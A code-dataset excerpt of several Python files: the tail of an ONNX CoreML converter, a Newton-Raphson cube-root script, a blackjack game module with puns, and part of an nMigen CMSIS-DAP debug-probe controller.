nb2.extend_inputs(nb1.output_names)\n nb2.extend_outputs(outputs)\n nb2.add_attribute('axes', [1])\n nb2.add_attribute('keepdims', False)\n\n return [nb.make_node() for nb in [nb1, nb2]]\n\n\nregistration.register_nn_converter('dot', DotProductLayerConverter)\n","sub_path":"onnxmltools/convert/coreml/NeuralNetwork/dot.py","file_name":"dot.py","file_ext":"py","file_size_in_byte":3320,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"405780186","text":"y =int(input(\"Enter number to find its cube root:\"))\nnumGuess=0\nx =y/2\nerror = 0.0000000001\n\nwhile abs(x**3 - y) > error:\n x = x - (x**3 - y)/(2*x**2)\n numGuess += 1\n print('Number of Guesses:'+str(numGuess), 'x:'+str(x))\nprint(\"The cube root of\",y,'is close to:',x)\n","sub_path":"cubeRootNewton_Raphson.py","file_name":"cubeRootNewton_Raphson.py","file_ext":"py","file_size_in_byte":276,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"424455866","text":"\"\"\" Classes and functions used in my project. 
\"\"\"\n\n# Classes:\n\nimport random\n\nclass DeckOfCards():\n \"\"\"\n Creates a deck of cards with which to play. \n For loop based on code found on StackExchange.\n \"\"\"\n\n # creates a deck of cards with 4 of each type\n deck = ['A' ,'K' ,'Q' , 'J', '10', '9', '8', '7', '6', '5', '4', '3', '2'] * 4\n \n \n def shuffle(self, value):\n \"\"\"Picks a certain number of cards randomly from the deck.\n \n Parameters\n ----------\n value : int\n Number of cards to randomly choose.\n \n Returns\n -------\n cards : list\n List of the random cards.\n \"\"\"\n \n cards = []\n \n # choses a card randomly and puts it in the cards list\n # Citation: https://codereview.stackexchange.com/questions/194812/\n # a-simple-blackjack-game-implementation-in-python\n for num in range(value):\n \n max_num = len(self.deck) - 1\n picked = random.randint(0,max_num)\n cards.append(self.deck[picked])\n \n # takes out the chosen card from the deck\n self.deck.pop(picked)\n \n return cards\n \n\nclass Player():\n \"\"\"Creates a player with their own characteristics. \"\"\"\n \n def __init__(self, name):\n \"\"\"Gives each player a name, money, and a hand of cards, \n and keeps track of the money they bet.\n \n Parameters\n ----------\n name : str\n Input name of player. \n \"\"\"\n \n self.name = name\n self.money = 500\n self.hand = []\n self.bet = 0\n\n\nclass Dealer():\n \"\"\"Creates a dealer with a hand of cards against which players compete. \n Also keeps track of the total money lost by the players.\"\"\"\n \n def __init__(self):\n self.hand = []\n self.total_money = 0\n\n\n# Functions: \n\ndef player_names():\n \"\"\"Asks for each players' name, creates an instance of Player for each, \n and puts them in a list.\n \n Returns\n -------\n player_instances : list\n The list of all instances of players in the game.\n \n \"\"\"\n \n player_instances = []\n keep_asking = True\n \n # continues to request new players' names as long as there are more\n while keep_asking == True:\n \n # asks for the player's name\n name = input('What is this player\\'s name?: ')\n player_instances.append(Player(name))\n new_player = True\n \n # checks if there are more to be input\n while new_player == True:\n \n try:\n \n another = input('Is there another player?: ')\n \n # there is another player, so continues onto next player\n if another == 'Yes'or another == 'yes':\n\n keep_asking = True\n new_player = False\n \n # there are no more players, so ends loops\n elif another == 'No' or another == 'no':\n \n keep_asking = False\n new_player = False\n \n # unclear answer, so asks again\n else:\n \n raise Exception\n \n except Exception:\n \n print('Whoops! 
Please print yes or no.')\n \n return player_instances\n \n \ndef bet(list_of_names, dealer):\n \"\"\"\n Allows players to place bets.\n \n Parameters\n ----------\n list_of_names : list\n Previously defined player list from player_names function.\n dealer : instance of Dealer()\n An instance of the Dealer.\n \n \"\"\"\n \n # asks each player for inital bets\n for person in list_of_names:\n \n valid = True\n \n while valid:\n \n try:\n \n person.bet = input('Player {}, place your initial bet: '.format(person.name))\n # takes bet away from personal money total\n person.money -= int(person.bet)\n \n # continues to next player if player has enough money for their bet\n if person.money >= 0:\n \n valid = False\n \n # raises error if player bets more than they have\n elif person.money < 0:\n \n person.money = 500\n raise Exception\n \n # allows players to bet again if they tried to bet too much\n except Exception:\n \n print('Whoops! You only have 500 USD to start. Try again.')\n \n # gives all the money to the dealer\n dealer.total_money += int(person.bet)\n \n # shows money each player has\n print('\\nRemaining Balances: \\n')\n for person in list_of_names:\n \n print(person.name + ': ' + str(person.money) + ' USD')\n \n print('\\n' + '*****' * 15)\n \n \ndef cards_value(hand):\n \"\"\"\n Determines the numeric value of the current hand.\n \n Parameters\n ----------\n hand : list\n List of strings of cards player has.\n \n Returns\n -------\n total : int\n Sum of the values of each card in the hand.\n \n \"\"\"\n \n # assigns numeric value to each card face\n values_of_cards = {'A': 11, 'K': 10, 'Q': 10, 'J': 10, '10': 10, \n '9': 9, '8': 8, '7': 7, '6': 6, '5': 5, '4': 4, '3': 3, '2': 2}\n total = 0\n \n # sums values of all the cards in the hand\n for card in hand:\n \n this_value = values_of_cards[card]\n total += this_value\n \n # allows ace to have value 11 or 1\n if 'A' in hand and total > 21:\n total -= 10\n \n return total\n\n\ndef pun_machine(total):\n \"\"\"\n Assigns puns to the different totals a hand can have.\n \n Parameters\n ----------\n total : int\n The sum of the card values in a given hand.\n \n Returns\n -------\n chosen_pun : str\n The pun associated with the input total.\n \"\"\"\n \n # set of puns associated with most possible total values\n pun_dict = {4: 'Why didn\\'t the two 4\\'s feel like dinner? Because they already 8.',\n 5: 'I got into a fight with 1, 3, 5, 7 and 9. The odds were against me.', \n 6: 'Why is 6 afriad of 7? Because 7 8 9.',\n 7: 'How do you make 7 an even number? Take the s out!', \n 8: 'What did the 0 say to the 8? Nice belt.', \n 9: 'Why couldn\\'t the German count to 10? Because he was stuck on nein.',\n 10: 'Why is 10 afriad of 7? Because 7 8 9, and 10 is next.', \n 11: 'There was a murder. 2, 3, 5, 7 and 11 are the prime suspects.',\n 12: 'Why can\\'t a nose be 12 inches long? Because then it would be a foot.',\n 13: 'The number 13? Not on my watch.',\n 14: 'How does a blackjack dealer sneak about? He shuffles a round.', \n 15: 'How are 15 year old girls like their age? They can\\'t even.', \n 16: 'Why can\\'t you play blackjack in the wild? Because of all the cheetahs.', \n 17: 'To hit or not to hit, that is the question.', \n 18: '18 & 20 were playing a game of blackjack. Twenty one.', \n 19: '19 & 20 were playing a game of blackjack. Twenty one.',\n 20: 'Why is 9 afraid of 20? Because twenty eight twenty nine\\'s.',\n 21: 'BLACKJACK!!', \n 22: 'Why did all the numbers laugh at 22 ? 
Because it had tu tu’s'}\n \n # chooses pun based on total value of hand\n chosen_pun = pun_dict[total]\n return chosen_pun\n","sub_path":"my_module/classes_and_functions.py","file_name":"classes_and_functions.py","file_ext":"py","file_size_in_byte":7908,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"517113326","text":"from nmigen import *\nfrom .dbgIF import DBGIF\n\n# Principle of operation\n# ======================\n#\n# This module takes frames from the stream handler, parses them and sends them to the dbgif below for\n# processing. In general this layer avoids doing any manipulation of the line, that is all handled\n# below, with the intention of being able to replace cmsis-dap with another dap controller if\n# needed.\n#\n# Communication with the dbgif is via a register and flag mechanism. Registers are filled with the\n# appropriate information, then 'go' is set. When the dbgif accepts the command it drops 'done'\n# and this layer can then release 'go'. When the command finishes 'done' is set true again.\n#\n# Default configuration information\n# =================================\n\nDAP_CONNECT_DEFAULT = 1 # Default connect is SWD\nDAP_VERSION_STRING = Cat(C(0x31,8),C(0x2e,8),C(0x30,8),C(0x30,8),C(0,8))\nDAP_CAPABILITIES = 0x03 # JTAG and SWD Debug\nDAP_TD_TIMER_FREQ = 0x3B9ACA00 # 1uS resolution timer\nDAP_MAX_PACKET_COUNT = 1 # 1 max packet count\nDAP_V1_MAX_PACKET_SIZE = 64\nDAP_V2_MAX_PACKET_SIZE = 511\nMAX_MSG_LEN = DAP_V2_MAX_PACKET_SIZE\n\n# CMSIS-DAP Protocol Messages\n# ===========================\n\nDAP_Info = 0x00\nDAP_HostStatus = 0x01\nDAP_Connect = 0x02\nDAP_Disconnect = 0x03\nDAP_TransferConfigure = 0x04\nDAP_Transfer = 0x05\nDAP_TransferBlock = 0x06\nDAP_TransferAbort = 0x07\nDAP_WriteABORT = 0x08\nDAP_Delay = 0x09\nDAP_ResetTarget = 0x0a\nDAP_SWJ_Pins = 0x10\nDAP_SWJ_Clock = 0x11\nDAP_SWJ_Sequence = 0x12\nDAP_SWD_Configure = 0x13\nDAP_JTAG_Sequence = 0x14\nDAP_JTAG_Configure = 0x15\nDAP_JTAG_IDCODE = 0x16\nDAP_SWO_Transport = 0x17\nDAP_SWO_Mode = 0x18\nDAP_SWO_Baudrate = 0x19\nDAP_SWO_Control = 0x1a\nDAP_SWO_Status = 0x1b\nDAP_SWO_Data = 0x1c\nDAP_SWD_Sequence = 0x1d\nDAP_SWO_ExtendedStatus = 0x1e\nDAP_ExecuteCommands = 0x7f\n\nDAP_QueueCommands = 0x7e\nDAP_Invalid = 0xff\n\n# Commands to the dbgIF\n# =====================\n\nCMD_RESET = 0\nCMD_PINS_WRITE = 1\nCMD_TRANSACT = 2\nCMD_SET_SWD = 3\nCMD_SET_JTAG = 4\nCMD_SET_SWJ = 5\nCMD_SET_JTAG_CFG = 6\nCMD_SET_CLK = 7\nCMD_SET_SWD_CFG = 8\nCMD_WAIT = 9\nCMD_CLR_ERR = 10\nCMD_SET_RST_TMR = 11\nCMD_SET_TFR_CFG = 12\nCMD_JTAG_GET_ID = 13\nCMD_JTAG_RESET = 14\n\n# TODO/Done\n# =========\n\n# DAP_Info : Done\n# DAP_Hoststatus : Done (But not tied to h/w)\n# DAP_Connect : Done + Tested for SWD, Not for JTAG\n# DAP_Disconnect : Done\n# DAP_WriteABORT : Done\n# DAP_Delay : Done\n# DAP_ResetTarget : Done\n# DAP_SWJ_Pins : Done\n# DAP_SWJ_Clock : Done\n# DAP_SWJ_Sequence : Done\n# DAP_SWD_Configure : Done\n# DAP_SWD_Sequence :\n# DAP_SWO_Transport : Not implemented\n# DAP_SWO_Mode : Not implemented\n# DAP_SWO_Baudrate : Not implemented\n# DAP_SWO_Control : Not implemented\n# DAP_SWO_Status : Not implemented\n# DAP_SWO_ExtendedStatus : Not implemented\n# DAP_SWO_Data : Not implemented\n# DAP_JTAG_Sequence :\n# DAP_JTAG_Configure :\n# DAP_JTAG_IDCODE :\n# DAP_Transfer_Configure : Done\n# DAP_Transfer : Done (Masking done, not tested)\n# DAP_TransferBlock : Done\n# DAP_TransferAbort : Done\n# DAP_ExecuteCommands :\n# DAP_QueueCommands :\n\n# This is the RAM used to store 
responses before they are sent back to the host\n# =============================================================================\n\nclass WideRam(Elaboratable):\n def __init__(self):\n self.adr = Signal(range((MAX_MSG_LEN//4)))\n self.dat_r = Signal(32)\n self.dat_w = Signal(32)\n self.we = Signal()\n self.mem = Memory(width=32, depth=MAX_MSG_LEN//4)\n\n def elaborate(self, platform):\n m = Module()\n m.submodules.rdport = rdport = self.mem.read_port()\n m.submodules.wrport = wrport = self.mem.write_port()\n m.d.comb += [\n rdport.addr.eq(self.adr),\n wrport.addr.eq(self.adr),\n self.dat_r.eq(rdport.data),\n wrport.data.eq(self.dat_w),\n wrport.en.eq(self.we),\n ]\n return m\n\n# This is the CMSIS-DAP handler itself\n# ====================================\n\nclass CMSIS_DAP(Elaboratable):\n def __init__(self, streamIn, streamOut, dbgpins, v2Indication):\n # Canary\n self.can = Signal()\n\n # External interface\n self.running = Signal() # Flag for if target is running\n self.connected = Signal() # Flag for if target is connected\n\n self.isV2 = v2Indication\n self.streamIn = streamIn\n self.streamOut = streamOut\n self.rxBlock = Signal( 7*8 ) # Longest message we pickup is 6 bytes + command\n self.rxLen = Signal(3) # Rxlen to pick up\n self.rxedLen = Signal(3) # Rxlen picked up so far\n self.swjbits = Signal(8) # Number of bits of SWJ remaining outstanding\n\n self.txBlock = Signal( 14*8 ) # Response to be returned\n self.txLen = Signal(range(MAX_MSG_LEN)) # Length of response to be returned\n self.txedLen = Signal(range(MAX_MSG_LEN)) # Length of response that has been returned so far\n self.busy = Signal() # Indicator that we can't receive stream traffic at the moment\n\n self.txb = Signal(5) # State of various orthogonal state machines\n\n # Support for SWJ_Sequence\n self.bitcount = Signal(3) # Bitcount in transmission sequence\n\n # Support for JTAG_Sequence\n self.tmsValue = Signal() # TMS value while performing JTAG sequence\n self.tdoCapture = Signal() # Are we capturing TDO when performing JTAG sequence\n self.tdiData = Signal(8) # TDI being sent out\n self.tdoCount = Signal(4) # Count of tdi bits being sent\n self.tdiCount = Signal(4) # Count of tdi bits being received\n self.seqCount = Signal(8) # Number of sequences that follow\n self.tckCycles = Signal(6) # Number of tckCycles in this sequence\n self.tdotgt = Signal(7) # Number of tdo cycles to collect (note the extra bit)\n self.pendingTx = Signal(8) # Next octet to be sent out of streamIn\n self.tdoBuild = Signal(8) # Return value being built\n\n # Support for DAP_Transfer\n self.dapIndex = Signal(8) # Index of selected JTAG device\n self.transferCount= Signal(16) # Number of transfers 1..65535\n\n self.mask = Signal(32) # Match mask register\n\n self.retries = Signal(16) # Retry counter for WAIT\n self.matchretries = Signal(16) # Retry counter for Value Matching\n\n self.tfrReq = Signal(8) # Transfer request from controller\n self.tfrData = Signal(32) # Transfer data from controller\n\n # CMSIS-DAP Configuration info\n self.ndev = Signal(8) # Number of devices in signal chain\n self.irlength = Signal(8) # JTAG IR register length for each device\n\n self.waitRetry = Signal(16) # Number of transfer retries after WAIT response\n self.matchRetry = Signal(16) # Number of retries on reads with Value Match in DAP_Transfer\n\n self.dbgpins = dbgpins\n # -------------------------------------------------------------------------------------\n def RESP_Invalid(self, m):\n # Simply transmit an 'invalid' packet back\n m.d.sync += [ 
self.txBlock.word_select(0,8).eq(C(DAP_Invalid,8)), self.txLen.eq(1), self.busy.eq(1) ]\n m.next = 'RESPOND'\n # -------------------------------------------------------------------------------------\n def RESP_Info(self, m):\n # \n # Transmit requested information packet back\n m.next = 'RESPOND'\n\n with m.Switch(self.rxBlock.word_select(1,8)):\n # These cases are not implemented in this firmware\n # Get the Vendor ID, Product ID, Serial Number, Target Device Vendor, Target Device Name\n with m.Case(0x01, 0x02, 0x03, 0x05, 0x06):\n m.d.sync += [ self.txLen.eq(2), self.txBlock[8:16].eq(Cat(C(0,8))) ]\n with m.Case(0x04): # Get the CMSIS-DAP Firmware Version (string)\n m.d.sync += [ self.txLen.eq(7), self.txBlock[8:56].eq(Cat(C(5,8),DAP_VERSION_STRING))]\n with m.Case(0xF0): # Get information about the Capabilities (BYTE) of the Debug Unit\n m.d.sync+=[self.txLen.eq(3), self.txBlock[8:24].eq(Cat(C(1,8),C(DAP_CAPABILITIES,8)))]\n with m.Case(0xF1): # Get the Test Domain Timer parameter information\n m.d.sync+=[self.txLen.eq(6), self.txBlock[8:56].eq(Cat(C(8,8),C(DAP_TD_TIMER_FREQ,32)))]\n with m.Case(0xFD): # Get the SWO Trace Buffer Size (WORD)\n m.d.sync+=[self.txLen.eq(6), self.txBlock[8:48].eq(Cat(C(4,8),C(0,32)))]\n with m.Case(0xFE): # Get the maximum Packet Count (BYTE)\n m.d.sync+=[self.txLen.eq(6), self.txBlock[8:24].eq(Cat(C(1,8),C(DAP_MAX_PACKET_COUNT,8)))]\n with m.Case(0xFF): # Get the maximum Packet Size (SHORT).\n with m.If(self.isV2):\n m.d.sync+=[self.txLen.eq(6), self.txBlock[8:32].eq(Cat(C(2,8),C(DAP_V2_MAX_PACKET_SIZE,16)))]\n with m.Else():\n m.d.sync+=[self.txLen.eq(6), self.txBlock[8:32].eq(Cat(C(2,8),C(DAP_V1_MAX_PACKET_SIZE,16)))]\n with m.Default():\n self.RESP_Invalid(m)\n # -------------------------------------------------------------------------------------\n def RESP_Not_Implemented(self, m):\n m.d.sync += self.txBlock.word_select(1,8).eq(C(0xff,8))\n m.next = 'RESPOND'\n # -------------------------------------------------------------------------------------\n def RESP_HostStatus(self, m):\n # \n # Set LEDs for condition of debugger\n m.next = 'RESPOND'\n\n with m.Switch(self.rxBlock.word_select(1,8)):\n with m.Case(0x00): # Connect LED\n m.d.sync+=self.connected.eq(self.rxBlock.word_select(2,8)==C(1,8))\n with m.Case(0x01): # Running LED\n m.d.sync+=self.running.eq(self.rxBlock.word_select(2,8)==C(1,8))\n with m.Default():\n self.RESP_Invalid(m)\n # -------------------------------------------------------------------------------------\n # -------------------------------------------------------------------------------------\n def RESP_Connect_Setup(self, m):\n # \n # Perform connect operation\n self.RESP_Invalid(m)\n\n if (DAP_CAPABILITIES&(1<<0)):\n # SWD mode is permitted\n with m.If ((((self.rxBlock.word_select(1,8))==0) & (DAP_CONNECT_DEFAULT==1)) |\n ((self.rxBlock.word_select(1,8))==1)):\n m.d.sync += [\n self.txBlock.word_select(0,16).eq(Cat(self.rxBlock.word_select(0,8),C(1,8))),\n self.dbgif.command.eq(CMD_SET_SWD),\n self.txLen.eq(2),\n self.dbgif.go.eq(1)\n ]\n m.next = 'DAP_Wait_Connect_Done'\n\n if (DAP_CAPABILITIES&(1<<1)):\n with m.If ((((self.rxBlock.word_select(1,8))==0) & (DAP_CONNECT_DEFAULT==2)) |\n ((self.rxBlock.word_select(1,8))==2)):\n m.d.sync += [\n self.txBlock.word_select(0,16).eq(Cat(self.rxBlock.word_select(0,8),C(2,8))),\n self.dbgif.command.eq(CMD_SET_JTAG),\n self.txLen.eq(2),\n self.dbgif.go.eq(1)\n ]\n m.next = 'DAP_Wait_Connect_Done'\n\n def RESP_Wait_Connect_Done(self, m):\n # Generic wait for inferior to process command\n 
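The generic wait above is one instance of the register-and-flag protocol described in this module's header: fill the registers, raise `go`, treat a falling `done` as the command being accepted, release `go`, then treat the next rising `done` as completion. A stripped-down sketch of that handshake using the same nMigen constructs as the surrounding module; `go`, `done` and `result_valid` are illustrative stand-ins, not the real dbgIF signals.

```python
# Stripped-down sketch of the go/done handshake the RESP_* helpers rely on.
# `go`, `done` and `result_valid` are illustrative stand-ins only.
from nmigen import Module, Signal

m = Module()
go, done, result_valid = Signal(), Signal(), Signal()

with m.If(go & ~done):
    m.d.sync += go.eq(0)             # inferior accepted the command: release go
with m.If(~go & done):
    m.d.sync += result_valid.eq(1)   # command finished: results can be read
```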
with m.If((self.dbgif.go==1) & (self.dbg_done==0)):\n m.d.sync+=self.dbgif.go.eq(0)\n with m.If((self.dbgif.go==0) & (self.dbg_done==1)):\n m.next='RESPOND'\n # -------------------------------------------------------------------------------------\n # -------------------------------------------------------------------------------------\n def RESP_Wait_Done(self, m):\n # Generic wait for inferior to process command\n with m.If((self.dbgif.go==1) & (self.dbg_done==0)):\n m.d.sync+=self.dbgif.go.eq(0)\n with m.If((self.dbgif.go==0) & (self.dbg_done==1)):\n m.d.sync += self.txBlock.bit_select(8,8).eq(Mux(self.dbgif.perr,0xff,0))\n m.next='RESPOND'\n # -------------------------------------------------------------------------------------\n def RESP_Disconnect(self, m):\n # \n # Perform disconnect\n m.d.sync += [\n self.running.eq(0),\n self.connected.eq(0)\n ]\n m.next = 'RESPOND'\n # -------------------------------------------------------------------------------------\n def RESP_WriteABORT(self, m):\n # \n # Post abort code to register\n # TODO: Add ABORT for JTAG\n m.d.sync += [\n self.dbgif.command.eq(CMD_TRANSACT),\n self.dbgif.apndp.eq(0),\n self.dbgif.rnw.eq(0),\n self.dbgif.addr32.eq(0),\n self.dbgif.dwrite.eq(self.rxBlock.bit_select(16,32)),\n self.dbgif.go.eq(1)\n ]\n\n m.next = 'DAP_Wait_Done'\n # -------------------------------------------------------------------------------------\n def RESP_Delay(self, m):\n # \n # Delay for programmed number of uS\n m.d.sync += [\n self.dbgif.dwrite.eq( Cat(self.rxBlock.bit_select(16,8),self.rxBlock.bit_select(8,8))),\n self.dbgif.command.eq( CMD_WAIT ),\n self.dbgif.go.eq(1)\n ]\n m.next = 'DAP_Wait_Done'\n # -------------------------------------------------------------------------------------\n def RESP_ResetTarget(self, m):\n # \n # Reset the target\n m.d.sync += [\n self.txBlock.bit_select(8,16).eq(Cat(C(0,8),C(1,1),C(0,7))),\n self.txLen.eq(3),\n self.dbgif.command.eq( CMD_RESET ),\n self.dbgif.go.eq(1)\n ]\n m.next = 'DAP_Wait_Done'\n # -------------------------------------------------------------------------------------\n def RESP_SWJ_Pins_Setup(self, m):\n # \n # Control and monitor SWJ/JTAG pins\n m.d.sync += [\n self.dbgif.pinsin.eq( self.rxBlock.bit_select(8,16) ),\n self.dbgif.countdown.eq( self.txBlock.bit_select(24,32) )\n ]\n m.next = 'DAP_SWJ_Pins_PROCESS';\n\n def RESP_SWJ_Pins_Process(self, m):\n # Spin waiting for debug interface to do its thing\n with m.If (self.dbg_done):\n m.d.sync += [\n self.txBlock.word_select(1,8).eq(self.dbgif.pinsout),\n self.txLen.eq(2)\n ]\n m.next = 'RESPOND'\n # -------------------------------------------------------------------------------------\n def RESP_SWJ_Clock(self, m):\n # <0x11> \n # Set clock frequency for JTAG and SWD comms\n m.d.sync += [\n self.dbgif.dwrite.eq( self.rxBlock.bit_select(8,32) ),\n self.dbgif.command.eq( CMD_SET_CLK ),\n self.dbgif.go.eq(1)\n ]\n m.next = 'DAP_Wait_Done'\n # -------------------------------------------------------------------------------------\n # -------------------------------------------------------------------------------------\n def RESP_SWJ_Sequence_Setup(self, m):\n # [n x .....]\n # Generate SWJ Sequence data\n m.d.sync += [\n # Number of bits to be transferred\n self.transferCount.eq(Mux(self.rxBlock.bit_select(8,8),Cat(self.rxBlock.bit_select(8,8),C(0,8)),C(256,16))),\n self.txb.eq(0),\n\n # Setup to have control over swdo, swclk and swwr (set for output), with clocks of 1 clock cycle\n self.dbgif.dwrite.eq(0),\n 
self.dbgif.pinsin.eq(0b0001_0011_0001_0000),\n self.bitcount.eq(0),\n self.dbgif.command.eq(CMD_PINS_WRITE)\n ]\n m.next = 'DAP_SWJ_Sequence_PROCESS'\n\n def RESP_SWJ_Sequence_Process(self, m):\n with m.Switch(self.txb):\n with m.Case(0): # Grab next octet(s) from stream ------------------------------------------------------------\n with m.If(self.streamOut.valid & self.streamOut.ready):\n m.d.sync += [\n self.tfrData.eq(self.streamOut.payload),\n self.txb.eq(1),\n self.busy.eq(1)\n ]\n with m.Else():\n m.d.sync += self.busy.eq(0)\n\n with m.Case(1): # Write the data bit -----------------------------------------------------------------------\n m.d.sync += [\n self.dbgif.pinsin[0:2].eq(Cat(C(0,1),self.tfrData.bit_select(0,1))),\n self.tfrData.eq(Cat(C(1,0),self.tfrData[1:8])),\n self.transferCount.eq(self.transferCount-1),\n self.dbgif.go.eq(1),\n self.bitcount.eq(self.bitcount+1),\n self.txb.eq(2)\n ]\n\n with m.Case(2): # Wait for bit to be accepted, then we can drop clk ----------------------------------------\n with m.If(self.dbg_done==0):\n m.d.sync += self.dbgif.go.eq(0)\n with m.If ((self.dbgif.go==0) & (self.dbg_done==1)):\n m.d.sync += [\n self.dbgif.pinsin[0].eq(1),\n self.dbgif.go.eq(1),\n self.txb.eq(3)\n ]\n\n with m.Case(3): # Now wait for clock to be complete, and move to next bit ----------------------------------\n with m.If(self.dbg_done==0):\n m.d.sync += self.dbgif.go.eq(0)\n with m.If ((self.dbgif.go==0) & (self.dbg_done==1)):\n with m.If(self.transferCount!=0):\n m.d.sync += self.txb.eq(Mux(self.bitcount,1,0))\n with m.Else():\n m.next = 'DAP_Wait_Done'\n\n # -------------------------------------------------------------------------------------\n # -------------------------------------------------------------------------------------\n def RESP_SWD_Configure(self, m):\n # <0x13> \n # Setup configuration for SWD\n m.d.sync += [\n self.dbgif.dwrite.eq( self.rxBlock.bit_select(8,8) ),\n self.dbgif.command.eq( CMD_SET_SWD_CFG ),\n self.dbgif.go.eq(1)\n ]\n m.next = 'DAP_Wait_Done'\n # -------------------------------------------------------------------------------------\n # -------------------------------------------------------------------------------------\n def RESP_JTAG_Configure(self, m):\n # n x [ ]\n # Set IR Length for Chain\n\n m.d.sync += [\n # We cope with up to 5 devices with IRLen of 1..32 bits\n self.dbgif.dwrite.eq( Cat( self.rxBlock.bit_select(11,5)-1,\n self.rxBlock.bit_select(19,5)-1,\n self.rxBlock.bit_select(27,5)-1,\n self.rxBlock.bit_select(35,5)-1,\n self.rxBlock.bit_select(43,5)-1,\n self.rxBlock.bit_select(51,5)-1,\n C(2,0) )\n ),\n self.dbgif.command.eq( CMD_SET_JTAG_CFG ),\n self.dbgif.go.eq(1)\n ]\n m.next = 'DAP_Wait_Done'\n # -------------------------------------------------------------------------------------\n # -------------------------------------------------------------------------------------\n def RESP_JTAG_IDCODE_Setup(self, m):\n # \n # Request ID code for specified device\n m.d.sync += [\n self.dbgif.command.eq(CMD_JTAG_GET_ID),\n self.dbgif.dwrite.eq( self.rxBlock.bit_select(8,8) ),\n self.txLen.eq(6),\n self.txBlock.bit_select(16,32).eq(0),\n self.dbgif.go.eq(1)\n ]\n\n m.next = 'JTAG_IDCODE_Process'\n\n def RESP_JTAG_IDCODE_Process(self, m):\n with m.If(self.dbg_done==0):\n m.d.sync += self.dbgif.go.eq(0)\n with m.Elif(self.dbg_done==1):\n m.d.sync += self.txBlock.bit_select(16,32).eq(self.dbgif.dread)\n m.next = \"RESPOND\"\n\n # -------------------------------------------------------------------------------------\n def 
RESP_TransferConfigure(self, m):\n # \n # Configure transfer parameters\n m.d.sync += [\n self.waitRetry.eq(self.rxBlock.bit_select(16,16)),\n self.matchRetry.eq(self.rxBlock.bit_select(32,16)),\n\n # Send idleCycles to layers below\n self.dbgif.dwrite.eq(self.rxBlock.bit_select(8,8)),\n self.dbgif.command.eq(CMD_SET_TFR_CFG),\n self.dbgif.go.eq(1)\n ]\n m.next = 'DAP_Wait_Done'\n # -------------------------------------------------------------------------------------\n # -------------------------------------------------------------------------------------\n def RESP_Transfer_Setup(self, m):\n # <0x05> ]\n # Triggered at start of a Transfer data sequence\n # We have the command, index and transfer count, need to set up to get the transfers\n\n m.d.sync += [\n self.dapIndex.eq(self.rxBlock.bit_select(8,8)),\n self.transferCount.eq(self.rxBlock.bit_select(16,8)),\n self.tfrram.adr.eq(0),\n self.busy.eq(1),\n self.txb.eq(0)\n ]\n\n # Filter for case someone tries to send us no transfers to perform\n # in which case we send back a good ack!\n with m.If(self.rxBlock.bit_select(16,8)!=0):\n m.next = 'DAP_Transfer_PROCESS'\n with m.Else():\n m.d.sync += [\n self.txBlock.word_select(2,8).eq(C(1,8)),\n self.busy.eq(0),\n self.txLen.eq(3)\n ]\n m.next = 'RESPOND'\n\n\n def RESP_Transfer_Process(self, m):\n m.d.comb += self.tfrram.dat_w.eq(self.dbgif.dread)\n\n # By default we don't want to receive any more stream data\n m.d.sync += self.busy.eq(1)\n\n with m.Switch(self.txb):\n with m.Case(0): # Get transfer request from stream, or the previous one if the post is finishing ----------\n with m.If(~(self.streamOut.valid & self.streamOut.ready)):\n m.d.sync += self.busy.eq(0)\n with m.Else():\n m.d.sync += [\n self.tfrReq.eq(self.streamOut.payload),\n self.retries.eq(0)\n ]\n\n # This is a good transaction from the stream, so record the fact it's in flow\n m.d.sync += self.txBlock.word_select(1,8).eq(self.txBlock.word_select(1,8)+1)\n\n # So now go do the read or write as appropriate\n with m.If ((~self.streamOut.payload.bit_select(1,1)) |\n self.streamOut.payload.bit_select(4,1) |\n self.streamOut.payload.bit_select(5,1) ):\n\n # Need to collect the value\n m.d.sync += self.txb.eq(1)\n with m.Else():\n # It's a read, no value to collect\n m.d.sync += [\n self.txb.eq(5),\n self.busy.eq(1)\n ]\n\n with m.Case(1,2,3,4): # Collect the 32 bit transfer Data to go with the command ----------------------------\n with m.If(self.streamOut.valid & self.streamOut.ready):\n m.d.sync+=[\n self.tfrData.word_select(self.txb-1,8).eq(self.streamOut.payload),\n self.txb.eq(self.txb+1)\n ]\n\n with m.If(self.tfrReq.bit_select(5,1) & (self.txb==5)):\n # This is a match register write\n m.d.sync += [\n self.mask.eq(Cat(self.streamOut.payload,self.tfrData.bit_select(0,24))),\n self.txb.eq(0)\n ]\n with m.Else():\n m.d.sync +=self.busy.eq(0)\n\n with m.Case(5): # We have the command and any needed data, action it ---------------------------------------\n m.d.sync += [\n self.dbgif.command.eq(CMD_TRANSACT),\n self.dbgif.apndp.eq(self.tfrReq.bit_select(0,1)),\n self.dbgif.rnw.eq(self.tfrReq.bit_select(1,1)),\n self.dbgif.addr32.eq(self.tfrReq.bit_select(2,2)),\n self.dbgif.dwrite.eq(self.tfrData),\n self.dbgif.go.eq(1),\n self.txb.eq(self.txb+1),\n ]\n\n with m.Case(6): # We sent a command, wait for it to start being executed -----------------------------------\n with m.If(self.dbg_done==0):\n m.d.sync+=[\n self.dbgif.go.eq(0),\n self.txb.eq(7)\n ]\n\n with m.Case(7): # Wait for command to complete 
-------------------------------------------------------------\n with m.If(self.dbg_done==1):\n # Write return value from this command into return frame\n m.d.sync += self.txBlock.word_select(2,8).eq(Cat(self.dbgif.ack,self.dbgif.perr)),\n\n # Now lets figure out how to handle this response....\n\n # If we're to retry, then lets do it\n with m.If(self.dbgif.ack==0b010):\n m.d.sync += [\n self.retries.eq(self.retries+1),\n self.txb.eq(Mux((self.retries1)):\n m.d.sync += self.txb.eq(0)\n with m.Else():\n with m.If(self.dbgif.postedMode):\n # Debug interface is in posting mode, better do one final read to collect the data\n m.d.sync += [\n self.tfrReq.eq(0x0E), # Read RDBUFF\n self.retries.eq(0),\n self.txb.eq(5)\n ]\n with m.Else():\n # Otherwise let's wrap up\n # All data have been processed, now lets send them back\n m.d.sync += self.txb.eq(8)\n\n with m.Case(8,9,10): # Transfer completed, start sending data back -----------------------------------------\n with m.If(self.streamIn.ready):\n m.d.sync += [\n self.streamIn.payload.eq(self.txBlock.word_select(self.txb-8,8)),\n self.streamIn.valid.eq(1),\n self.txb.eq(self.txb+1),\n self.streamIn.last.eq(self.isV2 & (self.txb==10) & (self.tfrram.adr==0))\n ]\n\n with m.Case(11): # Initial data sent, send any remaining material 